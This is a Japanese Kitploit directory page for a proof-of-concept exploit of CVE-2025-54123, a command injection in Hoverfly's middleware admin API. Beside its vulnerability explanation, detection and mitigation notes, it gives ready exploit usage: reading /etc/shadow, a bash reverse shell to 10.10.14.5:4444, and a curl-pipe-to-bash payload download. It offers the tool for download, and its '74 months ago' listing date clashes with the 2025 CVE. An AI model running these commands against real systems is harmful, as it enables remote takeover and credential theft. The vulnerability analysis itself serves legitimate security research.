Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-54123-Poc — CVE-2025-54123 Hoverfly 認証済みミドルウェア コマンドインジェクション RCE | Kitploit
ツール/GitHubGitHub/kasem545/cve-2025-54123-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHubkasem545/cve-2025-54123-poc

CVE-2025-54123-Poc

CVE-2025-54123 Hoverfly 認証済みミドルウェア コマンドインジェクション RCE

リポジトリを見る
74ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-54123 エクスプロイト

Hoverfly 認証済みミドルウェアコマンドインジェクション RCE | CVSS 9.8 CRITICAL(緊急)

脆弱性

Hoverfly <= 1.11.3 は、/api/v2/hoverfly/middleware エンドポイントを介した認証済みコマンドインジェクションに対して脆弱です。管理者の認証情報が必要ですが、認証されると、ミドルウェア機能はユーザーが指定した binary および script の値を検証なしに受け入れ、任意のコマンド実行を可能にします。

脆弱性チェーン

  1. 不十分な入力検証 - middleware.go が任意のバイナリパスを受け入れる
  2. 安全でないコマンド実行 - local_middleware.go がユーザー入力を exec.Command() に直接渡す
  3. 即時実行 - hoverfly_service.go が検証中にミドルウェアを実行する

要件

  • 有効な Hoverfly 管理者認証情報(ユーザー名/パスワード)
  • Hoverfly Admin API へのアクセス(デフォルトポート 8888)

使用方法

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> -c <COMMAND> [--shell SHELL]
  • -t, --target - Hoverfly API エンドポイント(必須)
  • -u, --username - 管理者ユーザー名(必須)
  • -p, --password - 管理者パスワード(必須)
  • -c, --command - 実行するコマンド(必須)
  • --shell - 使用するシェルバイナリ(デフォルト: /bin/bash)

使用例

root@kitploit:~
# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami

# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"

# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"

# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh

# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"

攻撃フロー

  1. 攻撃者は有効な管理者認証情報(Basic Auth)で認証する
  2. 悪意のあるペイロードを含む PUT リクエストを /api/v2/hoverfly/middleware に送信する
  3. Hoverfly はスクリプトを一時ファイル /tmp/hoverfly_<random> に書き込む
  4. 検証中に、<shell> /tmp/hoverfly_<random> を実行する
  5. コマンドの出力はエラーレスポンスの STDOUT セクションで返される
  6. エクスプロイトは出力を抽出して表示する

ペイロード構造

root@kitploit:~
{
    "binary": "/bin/bash",
    "script": "whoami"
}

HTTP ヘッダーには以下が含まれます:

root@kitploit:~
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json

影響

  • 完全なリモートコード実行(Hoverfly プロセスの権限で実行)
  • 認証情報の窃取 - API キー、トークン、シークレットを盗む
  • 内部ネットワークへのピボット - 隣接するシステムを侵害する
  • データの外部流出 - シミュレーションデータや設定にアクセスする
  • 永続化 - バックドアをインストールし、アクセスを維持する
  • サービス妨害 - ミドルウェア設定を変更/削除する

脆弱なコード箇所

  • core/middleware/middleware.go:94-96 - binary パラメータに対する入力検証がない
  • core/middleware/local_middleware.go:14-19 - 安全でない exec.Command() の使用
  • core/hoverfly_service.go:173 - 検証中の即時実行

影響を受けるバージョン

  • Hoverfly <= 1.11.3
  • Admin API にアクセス可能で認証が有効なすべてのインストール環境

検出

以下を確認してください:

  • /api/v2/hoverfly/middleware への PUT リクエスト
  • コマンド出力を含む "STDOUT:" を含むエラーレスポンス
  • /tmp/hoverfly/ 内の一時ファイル
  • hoverfly サービスによる異常なプロセス実行

緩和策

  • パッチ適用済みバージョンにアップグレードする(利用可能な場合)
  • Admin API へのアクセスを信頼できる IP のみに制限する
  • 強力な認証情報を使用する
  • /api/v2/hoverfly/middleware エンドポイントへのアクセスを監視する
  • binary/script パラメータに対する入力検証を実装する

参考情報

  • CVE-2025-54123
  • CWE-78(OS コマンドインジェクション)
  • CWE-20(不適切な入力検証)
  • GHSA-r4h8-hfp2-ggmf
  • https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  • https://nvd.nist.gov/vuln/detail/CVE-2025-54123

クレジット

初の発見者: @Kr1shna4garwal

ツールをダウンロード